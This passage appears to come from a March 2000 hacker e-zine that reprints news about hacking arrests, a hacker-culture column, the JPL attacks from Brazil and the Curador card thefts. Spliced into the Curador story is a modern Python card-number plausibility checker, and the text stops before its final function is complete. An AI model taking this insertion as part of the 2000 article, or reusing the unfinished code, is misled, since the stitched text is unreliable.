      As a culture we are just beginning to recognize this dynamic. One of the
      first hacker groups to benefit from our grudging acceptance of the craft
      is LOpht, which crossed over from the computing underground to the
      mainstream after finding flaws in Windows NT. Their transition has been so
      successful that when Congress conducted an investigation into Internet
      security it asked two LOpht members, Mudge and Weld Pond, to come to
      Washington for a briefing. Now LOpht has teamed up with former Compaq
      Computer executives to form @Stake, a security firm that has the media and
      Wall Street swooning.
      
      So when is a hacker not a felon? When he receives $10 million in venture
      capital? When Congress invites him to a hearing?
      
      When we lump all hackers into a criminal class we are liable to forget
      their essential role as architects of the information age. Edward O.
      Wilson said that scientists are characterized by a passion for knowledge,
      obsession, and daring. Hackers share that passion, the hunter-gatherer
      gene for restless wandering, wondering what's beyond the next hill. They
      hack because it's fun, because it's a challenge, and because the activity
      shapes their identity. Their strengths -- love of risk, toleration of
      ambiguity, and ability to sift meaning from disparate sources -- power the
      very network we all rush to join.
      
      
      **********************************************************************
      
      Islands in the Clickstream is an intermittent column written by
      Richard Thieme exploring social and cultural dimensions
      of computer technology and the ultimate concerns of our lives.
      Comments are welcome.
      
      Feel free to pass along columns for personal use, retaining this
      signature file. If interested in (1) publishing columns
      online or in print, (2) giving a free subscription as a gift, or
      (3) distributing Islands to employees or over a network,
      email for details.
      
      To subscribe to Islands in the Clickstream, send email to
      rthieme@thiemeworks.com with the words "subscribe islands" in the
      body of the message. To unsubscribe, email with "unsubscribe
      islands" in the body of the message.
      
      Richard Thieme is a professional speaker, consultant, and writer
      focused on the impact of computer technology on individuals and
      organizations - the human dimensions of technology and work - and
      "life on the edge."
      
      Islands in the Clickstream (c) Richard Thieme, 2000. All rights reserved.
      
      ThiemeWorks on the Web:  http://www.thiemeworks.com and
      http://www.richardthieme.com
      
      ThiemeWorks  P. O. Box 170737  Milwaukee WI 53217-8061  414.351.2321
      *********************************************************************
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA            

226.0 ISN:Man angry at employer swallows own head.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://www.sjmercury.com/breaking/docs/073358.htm
      
      NEW YORK (AP) [03.15.2000] - A database engineer angry at his employer
      was arrested on charges of using codes to disable computers in a
      three-day cyber attack on the company, authorities said Wednesday.
      
      Abdelkader Smires, 31, was arrested Tuesday and charged with
      intentionally causing damage through the unauthorized use of a
      computer.
      
      Computers at Internet Trading Technologies crashed for several hours
      over the three-day period beginning March 9. The attacks were traced
      to a computer at Queens College and authorities determined that
      Smires, who had once taught computer science there, had been using
      that computer, according to a criminal complaint.
      
      The company processes trades electronically for members of the
      National Association of Securities Dealers.
      
      The alleged attacks began after Smires and another engineer -- who was
      not named -- refused to help consultants and other workers learn the
      company's new operating system without more money, job security and
      equity, authorities said.
      
      On March 8, the company offered Smires a $70,000 raise, $50,000 in
      stock options and a one-year contract, but Smires turned them down,
      authorities said.
      
      The charge is punishable by up to five years in prison. Smires was in
      jail without bail pending a hearing Friday in federal court. He was to
      be assigned a public defender. Calls to the public defender's office
      were not immediately returned Wednesday.
      
      
      
      *-------------------------------------------------*
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred. M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *-------------------------------------------------*
      
      
      sniff.
      
      @HWA
      
      
227.0 ISN:Nasa division battles the hack from ipanema.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.newsbytes.com/pubNews/00/145708.html
      
      By Robert MacMillan, Newsbytes
      WASHINGTON, DC, U.S.A.,
      15 Mar 2000, 1:15 PM CST
      
      From Antonio Carlos Jobim to the samba, the US generally has welcomed
      some of the cooler cultural exports from Brazil, but the latest one -
      a series of hack attacks on NASA's Jet Propulsion Laboratory at
      CalTech - has the agency bossa nova-ing its way toward beefing up its
      security measures.
      
      JPL Spokesman Frank O'Donnell confirmed for Newsbytes an MSNBC report
      that the agency has shut down access to queries emanating from Brazil
      until the agency's security team makes some necessary improvements to
      its network.
      
      O'Donnell said that the Brazil shutout was not a "blacklist" attempt,
      as earlier reports indicated.
      
      "There was a number of recent attacks on JPL hosts originating from
      various sites in Brazil, and as a temporary move while our computer
      security people work, we're blocking network access to JPL from
      Brazil," O'Donnell said. "But this is a temporary thing."
      
      He said normal service to South America's largest nation would return
      "in a matter of days at most."
      
      He added that he is "not aware of any (security) compromises per se in
      these attacks."
      
      Highly secure data at JPL generally is not stored on hosts that are
      connected to the Internet, O'Donnell also said, but added that he
      could "not go into a great deal of detail" on what kind of information
      was sought.
      
      MSNBC reported the Brazil problem after a network analyst at the Bank
      of Brazil in Brasilia reported that he could not access the JPL site.
      
      The service also reported that a CERT official at its headquarters in
      Pittsburgh, Pa., said that blocking access to an entire network or
      country is reasonably common, though the official said that with spoofing
      attacks - when the address of the attacking e-mail in a denial of
      service attack is falsified - blocking against a particular domain or
      country code becomes largely ineffective.
      
      O'Donnell said that CERT and the JPL have been working jointly on
      security issues.
      
      
      
      
      @HWA            

228.0 ISN:Toys'R'Us
      ~~~~~~~~~~~~~
      
      http://www.washingtonpost.com/cgi-bin/gx.cgi/AppLogic+FTContentServer?pagename=wpni/print&articleid=A52710-2000Mar10
      
      Toys 'R' U.S.
      
      By William M. Arkin
      Special to washingtonpost.com
      Monday , March 13, 2000
      
      The Navy's announcement that it is arming 2,000 ship-based officers
      with Palm V computers would seem, at first glance, to be a sound
      business decision, and proof that the Pentagon can indeed buy "off the
      shelf" products to the benefit of the taxpayer.
      
      The purchase is touted as the largest government buy ever of hand-held
      devices. But is it an investment in productivity, or a faddish move
      that has no place in the military arena?
      
      "It's one of the neatest things I've ever seen," Lt. Jeff Keenan told
      the Associated Press. Keenan is a combat systems officer aboard the
      Norfolk-based destroyer USS Laboon. "I used to be one of those people
      who carried around a big date book all the time, and I'd misplace it
      plenty of times, particularly when you'd put it down to climb a
      ladder," Keenan said.
      
      Don't burn your notebook just yet, Jeff.
      
      Though his Palm V packs the equivalent of a message center,
      walkie-talkie and clipboard, you can't get it wet.
      
      Plug and Play
      
      Laptop computers, pagers, and hand-held devices are sprouting like
      weeds in the military. While many are truly purchases direct from
      civilian vendors, others are made to order for the wear and tear of
      the battlefield: waterproof, mud-proof, shock-resistant, anti-glare,
      and electromagnetic pulse surviving.
      
      These computers--Mini-Python, the M-30, Condor, FALCon, and Warlord
      Notebook--could almost be weapons given their ingenious names. Better
      able to survive the rigors of combat, they are much more expensive
      than either the Palm V or any high-end commercial laptop.
      
      "A Palm Pilot is five ounces of dead weight in a firefight," says one
      military technology expert. For the battlefield, the Army's Force XXI
      experiment is testing dozens of laptops and helmet and body-mounted
      computers (called "appliques") to link soldiers, officers, and
      equipment.
      
      The Navy is not without its own sea-going technology. One company has
      produced a $30,000 laptop approved for use on the decks of ships
      because it can sustain sea spray, intense sunlight and the extreme
      electromagnetic interference from shipboard radar.
      
      Is this indeed "a battlefield bristling with leap-ahead technology,"
      as former Secretary of Defense William Perry described the Army's
      digitization effort a few years back? Or is it the cyber equivalent of
      the $600 toilet seat?
      
      Solutions and Problems
      
      "Adolescence," is how Martin Libicki, an information technology expert
      at the Rand Corporation calls the current state of electronic
      offerings. Libicki sees a technology harvest that will eventually reap
      true military benefits, but for now, he says: "If you are going to be
      an adult, you've got to go through it, zits and all."
      
      Libicki has been worrying about ways to ensure that if soldiers are
      ever captured with their gizmos, systems will not be compromised. "I'm
      worried about the guy who finds himself on the wrong side of an
      AK-47," he says. If the enemy were to gain access to the American
      tactical picture through a hand-held device or laptop, they could
      learn gaps in intelligence and "blue" (i.e., U.S. military)
      vulnerabilities.
      
      Thus Libicki has developed some ideas to ensure network security for
      the inherently vulnerable battlefield systems. There is his "GPS
      lock-out" idea, a $200 module that could be added to hand-held devices to
      incorporate a global positioning satellite system. If the device is
      reported behind enemy lines, the module assumes it has been captured
      and shuts the device down awaiting resynchronization.
      
      Then there is "dual password," which would allow a prisoner of war to
      key in a fake password to unlock his laptop for enemy interrogators.
      But the back-up password would bring up false data on the screen that
      would seem plausible. It would also send a signal to the mother ship
      that the unit has been lost. Libicki has even conceived of an
      artificial intelligence program that could monitor keystrokes and thus
      stress to determine that a machine is still functioning under normal
      circumstances.
      
      Adding without a Calculator
      
      Though Libicki is palpably excited by his engineering challenges, he
      also asks some pointed questions. Does any soldier who has the
      potential to be captured really need a laptop? In a world where you
      can see the enemy from far away, do soldiers even need to close in on
      the enemy? Are we just building the systems for "a high-tech
      Gettysburg?" Libicki asks.
      
      "The only time you want to get in and amongst the enemy is when there
      is no choice," he says.
      
      Laptop computers that can survive a nuclear war? Notebooks that can
      operate on the front lines? Hand-held devices on enclosed ships and
      submarines? Obviously there is potential for excess here.
      
      Beyond the question of waste though, there is the matter of
      practicality. Proliferation of personal devices ensures better
      communication, record keeping, and access to information. But when
      systems fail, will military people still have the skills to use the
      old grease pencil? I for one have been writing with a word processor
      for almost 20 years, and frankly I've lost my ability to write
      anything beyond a grocery list in long hand.
      
      Isn't war too important to be left to the laptop?
      
      Contact William M. Arkin at william_arkin@washingtonpost.com
      
      
      
      @HWA      
      
      "Why is a mouse when it spins?" - Dr Who 
      
      
229.0 ISN:Computer expert accused of hacking
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From: darek.milewski@pl.pwcglobal.com
      
      FBI Computer Expert Accused of Hacking
      Henry K. Lee, Chronicle Staff Writer
      Friday, March 24, 2000
      (c) 2000 San Francisco Chronicle
      
      URL:
      http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/03/24/MN57003.DTL
      
      
      Max Ray Butler seemed to be at the top of his game. For two years, the
      computer expert was a confidential source for an elite FBI computer crime
      squad, helping to ferret out scofflaws on the Internet. 
      
      Butler, also known as Max Vision, was also a self-described ``ethical
      hacker'' from the Silicon Valley who boasted that he could test the
      security of any computer system by penetrating it. 
      
      But Butler's cyber activity went too far, federal authorities say. 
      
      Butler, 27, of Berkeley appeared in federal court in San Jose yesterday on
      a 15-count federal indictment charging him with hacking into computers
      used by the University of California at Berkeley, national laboratories,
      federal departments, air force bases across the country and a NASA flight
      center. 
      
      Butler posted $50,000 cash bail yesterday after U.S. Magistrate Judge
      Patricia Turnbull ordered him not to use computers except for work. Butler
      and his attorney, Jennifer Granick of San Francisco, could not be reached
      for comment. 
      
      The indictment, handed down March 15, said Butler caused ``reckless
      damage'' as a result of intrusions in May 1998. Butler was also charged
      with possession, with intent to defraud, of 477 passwords belonging to
      customers of a Santa Clara- based Internet service provider. 
      
      The case underscores the potential risks involved when law-enforcement
      agencies use confidential informants with access to sensitive information. 
      
      ``Sources are often very close to criminal activity, and sometimes they
      cross the line,'' said Special Agent George Grotz, an FBI spokesman in San
      Francisco. 
      
      Grotz declined to say how Butler became an FBI informant and whether he
      was a federal source at the time of the alleged crimes. Grotz said Butler
      is no longer associated with the agency. 
      
      Friends of the suspect told the Associated Press that Butler was caught
      possibly violating the law several years ago and began working with the
      FBI to avoid charges. Seth Alves, 27, told the news agency that Butler was
      unfairly targeted after refusing to comply with an FBI request. 
      
      A 22-month investigation by the FBI and military investigators ended
      Tuesday morning when federal agents converged on a home on Dwight Way near
      the UC Berkeley campus, where Butler lives with his 23-year-old wife,
      Kimi Winters. No one answered the door. Butler turned himself in to the
      FBI in Oakland later that day. 
      
      Butler grew up in Idaho and lived with his family in Washington, where
      authorities said he has a 1997 misdemeanor conviction for attempted
      trafficking of stolen property. 
      
      He developed a proficiency with computers, eventually attracting the
      attention of the FBI's Computer Crime Squad, which used him as a
      confidential informant. 
      
      An FBI search warrant affidavit said Butler was ``well known'' to squad
      members and ``has provided useful and timely information on computer
      crimes in the past.''
      
      In 1997, Butler started a company known as Max Vision in Mountain View,
      specializing in ``penetration testing'' and ``ethical hacking'' procedures
      in which he would simulate for clients how a hacker would penetrate their
      computer systems, according to the company Web site. 
      
      ``Our client penetration rate is currently 100 percent,'' the site said,
      with recent clients including a large consortium of telecommunications
      companies, a major motion picture company and an e-commerce online auction
      service. 
      
      By 1998, Butler was living with Winters in a one-story San Jose apartment,
      where the couple started up their own Web-design company, Kimi Networks,
      records show. Reached by telephone yesterday, Winters hung up on a
      Chronicle reporter. 
      
      It was also from that apartment, according to the FBI, that Butler hacked
      into computers by using a computer software vulnerability known as a
      buffer overflow, which sends commands into a system that ordinarily would
      not be allowed. 
      
      Butler also allegedly invaded computers used by the Lawrence Berkeley
      National Laboratory. Vern Paxson, a computer scientist at the lab, noticed
      an online intruder conducting unauthorized scans of laboratory and UC
      Berkeley computers in May 1998 and used a monitoring device that later
      helped identify the source of the intrusions. 
      
      Paxson said yesterday that Butler's arrest was ``somewhat ironic'' but
      ``not totally surprising.''
      
      Paxson said a person later identified as Butler even sent him an
      apologetic e-mail a day after the computer intrusions. Butler also somehow
      obtained a confidential incident report Paxson had filed about the
      invasions, Paxson said. 
      
      
      @HWA            
      
230.0 ISN:Disney and Miramax Sued for 'Hacking'
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

      Forwarded From: Nelson Murilo <nelson@pangeia.com.br>
      
      
      [http://biz.yahoo.com/bw/000329/ca_bartko__1.html]
      
      Wednesday March 29, 8:09 am Eastern Time
      Company Press Release
      Disney and Miramax Sued for 'Hacking'
      Parts of 'The Fugitive Game' Allegedly Stolen For New Movie
      
      SAN FRANCISCO--(BUSINESS WIRE)--March 29, 2000--The Walt Disney Company
      and its Miramax division have made a computer hacker movie that ``hacked''
      the author's book without paying or giving credit to the writer, according
      to a lawsuit filed yesterday by Bartko, Zankel, Tarrant & Miller, a law
      firm representing best-selling author Jonathan Littman.
      
      Littman's suit alleges that the Disney/Miramax/Dimension Films production
      of the movie Takedown, which premiered earlier this month in 29 theatres
      in Paris, France, was based in large part on lifted segments of Littman's
      book, The Fugitive Game. Littman's book, published in 1996, is based on
      the celebrated capture of computer hacker Kevin Mitnick, who was billed at
      the time as the world's most notorious and dangerous ``cyberterrorist.''
      
      ``Jonathan Littman carefully researched the reality of the computer hacker
      underworld,'' said his lawyer Bill Edlund. ``His book articulated and
      supported his view that Kevin Mitnick was not the premeditated, greedy and
      destructive criminal portrayed by some of the media. Readers and critics
      received Littman's The Fugitive Game as a more in-depth presentation and
      entertaining expose of the flawed Mitnick prosecution than the overblown,
      self-interested media hype.''
      
      The Fugitive Game shows Mitnick to be not a terrorist, but a computer
      hacker, in part a misguided victim of a government entrapment effort that
      used a sleazy informant to lure Mitnick into hacking. A key element of
      Littman's book is his examination of the media hype spurred in New York
      Times articles by reporter John Markoff about the Mitnick story.
      
      Littman also questions Markoff's presentation of Tsutomu Shimomura, a
      computer security specialist who used hacking techniques similar to
      Mitnick's to trace Mitnick to his hideout in North Carolina.
      
      Shimomura and Markoff wrote their version of these events in their book
      Takedown, released at the same time as Littman's book. The book is based
      on the seven-week pursuit of Mitnick by Shimomura that led to Mitnick's
      arrest in February of 1995. The Disney organization purchased the book and
      movie rights to Takedown and have now released their movie version, hiring
      a cast that included lead actor Skeet Ulrich and screenwriters led by John
      Danza.
      
      ``The screenwriter could not shape the story told in the book Takedown
      into a workable script,'' said Edlund. ``Once the movie project began to
      flounder, Danza and other screenwriters lifted most of the first part of
      Littman's The Fugitive Game for the storyline and start of the movie
      Takedown. Littman's lawsuit is backed by e-mails allegedly sent by Danza.
      In the e-mails, the screenwriter admits that it was 'unfortunate' that
      Disney did not option the rights to the book The Fugitive Game to make the
      movie Takedown. Danza goes on to describe his desire to use Littman's
      insider information and parts of Littman's book in order to try and
      salvage the movie project.''
      
      The complaint presents a detailed comparison between Littman's book and
      the final shooting script for the movie Takedown, allegedly illustrating
      repeated and compelling similarities between the two. According to the
      allegations, the film Takedown and The Fugitive Game both open with a
      scene in a strip club frequented by a government informer who reveals to
      Mitnick information about ``SAS'' -- a secret Pacific Bell phone-tapping
      system that Mitnick subsequently breaks into and uses.
      
      Littman's lawsuit also contends that various themes and interpretations
      from his book that are absent from the book Takedown appear in the movie
      version of Takedown, including the government informer and entrapment of
      Mitnick, and the pressure on the government to capture Mitnick created by
      exaggerated media hype.
      
      Littman seeks to prevent Disney, Miramax and the other defendants from
      continuing to violate his copyrights by distributing the movie and to
      recover his damages and the wrongful profits that defendants obtained from
      the alleged theft of his work. Littman's lawyers say that the
      Disney-Miramax plagiarism tainted Littman's work by patching it into their
      motion picture.
      
      Because of this, he is also asking for damages that he claims resulted
      from opportunities he lost, including the opportunity for involvement with
      other movie projects based on The Fugitive Game.
      
      
      @HWA      
      
231.0 ISN:Hacker posts own version of Gore's speech online
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
            
      This might be the most pheared 'Dilbert Cubicle Gang' we've been
      hearing rumours about lately .. watch for them - Ed
      
      
      http://www.jsonline.com/news/gen/mar00/1muhack29032800.asp
      
      By Stanley A. Miller II
      of the Journal Sentinel staff
      
      Last Updated: March 28, 2000
      
      A hacker cracked into Marquette University's Web site early Tuesday,
      replacing the school's home page with a false front concerning Al
      Gore's speech at the college.
      
      The fake Web page posted false quotes about the vice president's
      address to the university Monday, claiming among other things that
      Gore said he plans to "rid this country of anyone who might question
      my motives, starting with deporting all Christians."
      
      John Hopkins, vice president for communications at Marquette
      University, said the school's information technology staff detected
      attempts to break into the network Monday morning and disconnected the
      college's link to the Internet so they could deal with the attacks.
      
      The school's link was restored around 5 p.m. Monday, and sometime
      between then and 1 a.m. Tuesday, a hacker broke in and replaced the
      school's Web page. Marquette's Web page was back to normal by around
      1:30 a.m. Tuesday.
      
      "Our IT people are working through this and figuring out what
      happened," Hopkins said. The fake home page "was up for a relatively
      limited period of time, and that time was early in the morning. I
      don't think very many people saw it."
      
      Brian Manganello, an FBI special agent, said Marquette officials
      contacted them about the attack, but he declined to comment further.
      
      "We were informed that external attempts were made to compromise their
      computer networks," he said. "We're investigating the matter."
      
      John Gapinski, chief operating officer for Sun Tzu Security Ltd., a
      technology security company in Milwaukee, said that if the hacker got
      administrative access to the school's network servers, the college
      could develop all kinds of problems.
      
      The computer intruder may have stashed viruses or other malignant
      programs for later use on the school's computers, he said.
      
      "It would be prudent for them to audit their
      systems," he said. "You can't necessarily trust anything now."
      
      
      *-------------------------------------------------*
      "Communications without intelligence is noise;
      Intelligence without communications is irrelevant."
      Gen. Alfred M. Gray, USMC
      ---------------------------------------------------
      C4I Secure Solutions             http://www.c4i.org
      *-------------------------------------------------*
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA            
      
232.0 ISN:Bennett leads cyber defense
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      MY mother makes me wear these clothes.
      
      
      http://deseretnews.com/dn/view/0,1249,155013410,00.html?
      
      Utah senator fears U.S. will be attacked by computer hackers
      
      By Lee Davidson
      Deseret News Washington correspondent
      
      WASHINGTON - Sen. Bob Bennett was appointed Monday to head a new Senate
      group designed to be a central clearing house for information on how
      to combat cyber-attacks.
      
      That comes after Bennett, R-Utah, said last week that he fears the
      next world war will not be fought with tanks and missiles, but by
      enemy hackers attacking the nation's computers to crash everything
      from the nation's utilities to its banking.
      
      Bennett also headed a similar committee that oversaw combating the
      Year 2000 computer glitch. His new Critical Infrastructure Protection
      Working Group emerges largely to address threats warned about by the
      earlier Y2K committee.
      
      Senate Majority Leader Trent Lott, R-Miss., said he formed the group
      and named Bennett to head it because "recent hacker attacks on major
      e-commerce and government Web sites demonstrate the importance of
      information security."
      
      Bennett said, "The interconnectivity and advanced capabilities of U.S.
      computer systems makes the United States more vulnerable to
      cyber-attacks than any other nation in the world. Such attacks could
      bring the U.S. economy to its knees."
      
      He added, "The CIP Working Group will serve as a central repository
      for this information and coordinate efforts to increase national
      awareness."
      
      Also appointed to the group were senators who chair regular committees
      that share some jurisdiction over the problem including Judiciary
      Committee Chairman Orrin Hatch, R-Utah.
      
      Others include senators who chair the Banking, Commerce, Foreign
      Relations, Energy, Intelligence, Appropriations, Environmental,
      Governmental Affairs and Armed Services committees, plus a few
      additional senators.
      
      Just last week, Bennett told a symposium on cyber-security that
      lessons learned from fighting Y2K problems showed him how vulnerable
      America is to an attack via computer hacking.
      
      "The most vulnerable country in the world to this kind of attack is
      the United States of America because we have the most advanced
      capabilities," he said.
      
      Bennett added that because computer systems are now so interconnected,
      "a cyber-attack one place can bring down services in all the other
      places in the world."
      
      He said the major threat would be if "a possible major state . . .
      would develop the resources for a concentrated, continuing and
      sophisticated attack over time" via computer hacking.
      
      Bennett added, "In my opinion, the next war will be this target rather
      than the traditional" weapons of war.
      
      
      
      @HWA            
      
233.0 ISN:Hackers rue blurred line between curiosity, vandalism
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      I didn't write it, folks; dictionaries are cheap these days,
      aren't they? - Ed
      
      http://www.techserver.com/noframes/story/0,2294,500185952-500248285-501250243-0,00.html
      
      By HARRY BRUINIUS, The Christian Science Monitor
      
      NEW YORK (March 28, 2000 2:20 a.m. EST http://www.nandotimes.com) -
      When Simple Nomad was younger, one of his favorite pastimes was
      worming his way into phone companies' computer systems. That was more
      than 10 years ago, before words like "Internet" and "hacker" were key
      words in the cultural lexicon - and before it was against the law.
      
      "I liked to take things apart and see how they worked," he says. "In
      that way, I'm considered 'old school.'"
      
      Getting around a computer system's security and exploring its
      technological nuance is part of the thrill of the pseudonymous world
      of the hacker underground, a relatively young cyberspace culture where
      computer programmers like Simple Nomad are driven to demonstrate their
      own technological skills.
      
      For many, the term "hacker" conjures up images of a precocious
      troublemaker smirking as he toys with the technologically challenged.
      Indeed, sometimes what the hacker underground sees as exploring,
      companies call trespassing.
      
      But hackers see a difference between their love of exploration and
      computer showmanship and recent attempts to shut down Web sites and
      steal credit-card information. They see themselves as pioneers, ones
      who are helping computer culture and science evolve - as opposed to
      the thieving (and amateur) tactics of those they derisively call
      "crackers."
      
      But as the Internet evolves into a giant superstore, the lines between
      black and white are blurring further. The hacking underground has a
      libertarian ethos that places a high value on the free flow of
      information. As a result, hackers often post techniques that can be
      used to crack system security. They argue that unauthorized hacks into
      systems are the only way to allow security techniques - as well as
      technology - to fully evolve.
      
      "I'll be the first to admit there are a lot of gray areas," says
      Simple Nomad, who runs Nomad Mobile Research Centre, a Web site that
      provides information on the security flaws in computer systems. "I've
      written tools that I know can be used for people to test their system,
      but I also know someone can turn around and use the same tools to
      break into a system."
      
      In the mid-1990s, as many in the Internet industry began clamoring for
      ways to protect against these intrusions, Congress passed legislation
      that made hacking a crime. Last week, Max Vision, the hacking alias of
      Max Ray Butler, was held on $100,000 bail after being indicted for
      breaking into government systems including NASA and the Department of
      Defense.
      
      The hacker community, however, bristles at being lumped with acts like
      last month's "denial of service" attacks against Internet behemoths
      like Yahoo! and eBay, attacks that lacked the technological
      sophistication they value. Many have tried to distinguish hackers from
      "black hats" or "crackers," who crack into systems to steal credit
      card information or do some kind of damage.
      
      "A lot of the underground isn't looking at this as a major hack, or
      even as a genuine act of hacking," says Space Rogue, editor of Hacker
      News Network and a computer scientist for security consortium
      @stake.com.
      
      A. Anonymous, a former "black hat" hacker who wrote the best-selling
      book "Maximum Security," was one of the first to give detailed
      information on how to crack a system's security. "All these other
      security books, not one of them taught you how to break into
      anything," he says. "But because there are standard things you must do
      to secure your system, you first need to know how the attacks work."
      
      Some of the roots of hacking come out of the "phone phreaking" of the
      1970s.
      
      According to the Hackers' Hall of Fame, the hacker Cap'n Crunch became
      a legend when he figured out how to reproduce the tone that authorizes
      long-distance service with a toy whistle from a cereal box. Later,
      many people - mostly kids - manipulated pay-phone wires with a paper
      clip to get "free" long-distance. As networks connected by phone wires
      began to evolve, so did the various ways to furtively plug into them.
      
      As young hackers explored the source code of systems, they began to
      think of ways to do it better. The result was a highly competitive
      community where, like playground basketball, a hacking "star" performs
      exploits that could become legendary.
      
      "When something is posted, immediately that motivates some people to
      want to do something better," says A. Anonymous. "As a result, ideas
      are being exposed to an evolution at an extremely rapid pace."
      
      Though Simple Nomad says he no longer breaks into systems, he notes
      that his Web site is listed as criminal on most Web-blocking software.
      "Which is unfortunate," he says, "because 9 out of 10 e-mails I get is
      from a system administrator saying 'Thank you, I used the stuff on
      your site to take care of my system.'"
      
      More and more, Internet security companies are using the techniques of
      the hacker underground to make systems more secure. And many of the
      old phone phreakers and black-hat crackers are being hired. "You stick
      with it long enough," says A. Anonymous, "and you shed the purple hair
      and put on a suit and tie."
      
      
      
      
      @HWA      
            
234.0 ISN:Curador worked as e-commerce consultant.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      http://www.internetnews.com/ec-news/article/0,2171,4_328071,00.html
      
      Before he was arrested by police in Wales last Thursday, the online
      credit card thief who called himself "Curador" worked as an e-commerce
      consultant, his former boss revealed Monday.
      
      As previously reported, an 18-year-old man in Clynderwen, Wales was
      arrested Thursday in connection with break-ins at nine e-commerce
      sites in recent weeks. Under U.K. law, Curador's name was not released
      by police, but Britain's Daily Telegraph reported Saturday that
      Curador's real name was Raphael Gray. The true name of his accomplice,
      who was also arrested, was not disclosed.
      
      While he was allegedly breaking into online stores in the United
      States, Canada, Thailand and Great Britain, Gray was also working to
      develop an e-commerce strategy for Console King, a mail-order company
      in Narberth, Wales.
      
      According to Sam Lee, managing director, the retailer of video games
      and DVDs hired Gray around Christmas 1999 on the recommendation of a
      job recruitment firm.
      
      "[Gray] told us that he worked for several companies, including a
      subsidiary of Microsoft. And he showed us some of the work he had
      done, and it was pretty good. As far as we knew, he had no criminal
      record," said Lee.
      
      Console King paid Gray about US$6.50 to build the company an online
      storefront. But Lee said he fired Gray in the beginning of March after
      Gray began failing to show up for work. Only last week did Lee learn
      that Gray had allegedly been involved in the online theft of about
      26,000 credit cards over the course of six weeks.
      
      "We couldn't believe it. He's put my company and my staff in jeopardy.
      He's so stupid he doesn't know what he's done," said Lee, who added
      that Console King has tightened security at its site since learning of
      Gray's true identity.
      
      Gray has been released on bail and according to Lee has been seen on
      the streets of Clynderwen, which has a population of 550.
      
      FBI officials declined to comment on whether Gray had used any of the
      stolen card numbers to place fraudulent orders. Britain's Daily Mail
      newspaper quoted a detective who said police had confiscated "a pile
      of stuff" from the homes of Gray and his accomplice.
      
      Gray also apparently used a card stolen from an online retailer named
      Albion's MO to register one of the sites where he posted stolen card
      numbers and diatribes about e-commerce security. According to Robert
      Koseluk of Carmel, Indiana, he received an unauthorized charge for
      $198 to register and set up a site at free-creditcard.com. Gray also
      apparently used a card stolen from Stacy Yaple of Jacksonville, Fla.,
      to register another site, e-crackerce.com.
      
      Lee of Console King said that Gray apparently had financial problems.
      Lee also said Gray would often borrow small amounts of money from him.
      
      "He never had any money. I had to lend him money for a haircut and for
      lunch. He came into work stinking and wore the same clothes everyday.
      I had to speak with him about his personal appearance and hygiene,"
      said Lee.
      
      At his Web sites, Gray has argued that he broke into other sites to
      shame operators into improving their shoddy security. Tim Ward, owner
      of feelgoodfalls.com, a site that Curador hit around the end of
      February, said Curador has had his desired effect.
      
      "There's some good that came out of this. We never intended to expose
      anybody's card numbers, but what he did resulted in us being more
      secure," said Ward, who revealed that his mother-in-law built the site
      at feelgoodfalls.com using Microsoft StoreFront. In the wake of the
      break-in, Ward has hired a security consulting firm to batten down the
      hatches.
      
      Michael Vatis, director of the FBI's National Infrastructure
      Protection Center, said Friday that regardless of a cracker's motives,
      breaking into a site is still a federal crime.
      
      "If someone gains unauthorized access to a computer that's engaged in
      interstate or foreign commerce, that access is a federal crime,
      whether the state of security is poor or excellent," said Vatis.
      
      Reuters reported Sunday that one of the credit cards that Curador had
      stolen belonged to none other than Microsoft Chairman Bill Gates. The
      report apparently was based on information gleaned from one of
      Curador's Web sites where he posted stolen credit card numbers.
      
      But that site, which is mirrored here, contains information suggesting
      the Reuters report is inaccurate. For example, the credit card number
      Curador posted and claimed was Gates' has only 12 digits, and the
      first four do not match any algorithms used by Visa, Mastercard,
      Discover, American Express, or any of the other major credit card
      companies.
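      The plausibility argument above (wrong length, and a leading prefix that
      belongs to no major network) is the same triage a fraud or incident team
      applies before treating a posted "card dump" as genuine. The following
      Python is an added example, not code from the article or from any party
      it names; the network prefix/length table is stated from general
      knowledge of public issuer ranges, and every sample number in it is
      constructed (the 12-digit string is a placeholder, not the number
      Curador posted).

```python
import re

# Leading-digit (IIN) patterns and permitted lengths for the four networks the
# article names. Main public ranges only (e.g. Discover's 622126-622925 block is
# omitted); this table is from general knowledge, not from the article.
NETWORKS = {
    "Visa":             (re.compile(r"^4"), {13, 16, 19}),
    "Mastercard":       (re.compile(r"^(5[1-5]|2(22[1-9]|2[3-9]\d|[3-6]\d\d|7[01]\d|720))"), {16}),
    "American Express": (re.compile(r"^3[47]"), {15}),
    "Discover":         (re.compile(r"^(6011|65|64[4-9])"), {16, 17, 18, 19}),
}


def luhn_ok(digits: str) -> bool:
    """Luhn mod-10 check digit used by all major payment networks."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9          # same as summing the two digits of the product
        total += d
    return total % 10 == 0


def classify(raw: str) -> dict:
    """Report what a purported card number passes: network match, length, checksum."""
    digits = re.sub(r"[\s-]", "", raw)
    result = {"digits": len(digits), "network": None,
              "length_ok": False, "luhn_ok": False}
    if not digits.isdigit():
        return result
    for name, (prefix, lengths) in NETWORKS.items():
        if prefix.match(digits):
            result["network"] = name
            result["length_ok"] = len(digits) in lengths
            break
    result["luhn_ok"] = luhn_ok(digits)
    return result


def plausible(raw: str) -> bool:
    """True only when prefix, length and Luhn checksum all agree on a real network."""
    r = classify(raw)
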